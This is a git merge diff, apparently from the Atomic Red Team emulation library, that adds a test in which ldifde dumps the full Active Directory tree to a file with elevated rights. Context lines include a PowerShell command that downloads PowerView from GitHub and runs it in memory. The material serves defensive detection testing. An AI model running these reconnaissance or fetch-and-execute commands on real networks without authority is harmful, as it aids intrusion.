Merge branch 'master' into password-policy-checks

2023-05-25 18:54:07 -05:00
parent be43e3cc29 f5564f54bf
commit 897aad996c
11 changed files with 199 additions and 2 deletions
@@ -1374,6 +1374,7 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Acti
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
+discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
@@ -949,6 +949,7 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Acti
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
+discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -2181,6 +2181,7 @@
  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
+  - Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
@@ -1566,6 +1566,7 @@
  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
+  - Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
@@ -95633,6 +95633,50 @@ discovery:
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
        name: powershell
+    - name: Active Directory Enumeration with LDIFDE
+      auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784
+      description: |
+        Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
+        The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Path to the file that ldifde will output
+          type: path
+          default: C:\Windows\temp
+        output_file:
+          description: The filename to be created by ldifde
+          type: string
+          default: atomic_ldifde.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'PowerShell ActiveDirectory Module must be installed
+
+          '
+        prereq_command: |
+          Try {
+              Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+              exit 0
+          }
+          Catch {
+              exit 1
+          }
+        get_prereq_command: |
+          if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+            Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+          } else {
+            Install-WindowsFeature RSAT-AD-PowerShell
+          }
+      executor:
+        elevation_required: true
+        command: 'ldifde.exe -f #{output_path}\#{output_file} -p subtree
+
+          '
+        cleanup_command: 'del #{output_path}\#{output_file}
+
+          '
+        name: command_prompt
  T1007:
    technique:
      modified: '2023-04-03T18:55:18.326Z'
@@ -83083,6 +83083,50 @@ discovery:
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
        name: powershell
+    - name: Active Directory Enumeration with LDIFDE
+      auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784
+      description: |
+        Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
+        The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Path to the file that ldifde will output
+          type: path
+          default: C:\Windows\temp
+        output_file:
+          description: The filename to be created by ldifde
+          type: string
+          default: atomic_ldifde.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'PowerShell ActiveDirectory Module must be installed
+
+          '
+        prereq_command: |
+          Try {
+              Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+              exit 0
+          }
+          Catch {
+              exit 1
+          }
+        get_prereq_command: |
+          if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+            Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+          } else {
+            Install-WindowsFeature RSAT-AD-PowerShell
+          }
+      executor:
+        elevation_required: true
+        command: 'ldifde.exe -f #{output_path}\#{output_file} -p subtree
+
+          '
+        cleanup_command: 'del #{output_path}\#{output_file}
+
+          '
+        name: command_prompt
  T1007:
    technique:
      modified: '2023-04-03T18:55:18.326Z'
@@ -32,6 +32,8 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr

 - [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)

+- [Atomic Test #14 - Active Directory Enumeration with LDIFDE](#atomic-test-14---active-directory-enumeration-with-ldifde)
+

 <br/>

@@ -487,4 +489,65 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R



+<br/>
+<br/>
+
+## Atomic Test #14 - Active Directory Enumeration with LDIFDE
+Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
+The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | Path to the file that ldifde will output | path | C:&#92;Windows&#92;temp|
+| output_file | The filename to be created by ldifde | string | atomic_ldifde.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+ldifde.exe -f #{output_path}\#{output_file} -p subtree
+```
+
+#### Cleanup Commands:
+```cmd
+del #{output_path}\#{output_file}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: PowerShell ActiveDirectory Module must be installed
+##### Check Prereq Commands:
+```powershell
+Try {
+    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+    exit 0
+}
+Catch {
+    exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+  Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
 <br/>
@@ -207,3 +207,44 @@ atomic_tests:
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
    name: powershell
+- name: Active Directory Enumeration with LDIFDE
+  auto_generated_guid: 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784
+  description: |
+    Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
+    The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_path:
+      description: Path to the file that ldifde will output
+      type: path
+      default: C:\Windows\temp
+    output_file:
+      description: The filename to be created by ldifde
+      type: string
+      default: atomic_ldifde.txt
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      PowerShell ActiveDirectory Module must be installed
+    prereq_command: |
+      Try {
+          Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+          exit 0
+      }
+      Catch {
+          exit 1
+      }
+    get_prereq_command: |
+      if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+        Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+      } else {
+        Install-WindowsFeature RSAT-AD-PowerShell
+      }
+  executor:
+    elevation_required: true
+    command: |
+      ldifde.exe -f #{output_path}\#{output_file} -p subtree
+    cleanup_command: |
+      del #{output_path}\#{output_file}
+    name: command_prompt
@@ -1333,3 +1333,4 @@ edddff85-fee0-499d-9501-7d4d2892e79b
 0b2eadeb-4a64-4449-9d43-3d999f4a317b
 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3
 13daa2cf-195a-43df-a8bd-7dd5ffb607b5
+22cf8cb9-adb1-4e8c-80ca-7c723dfc8784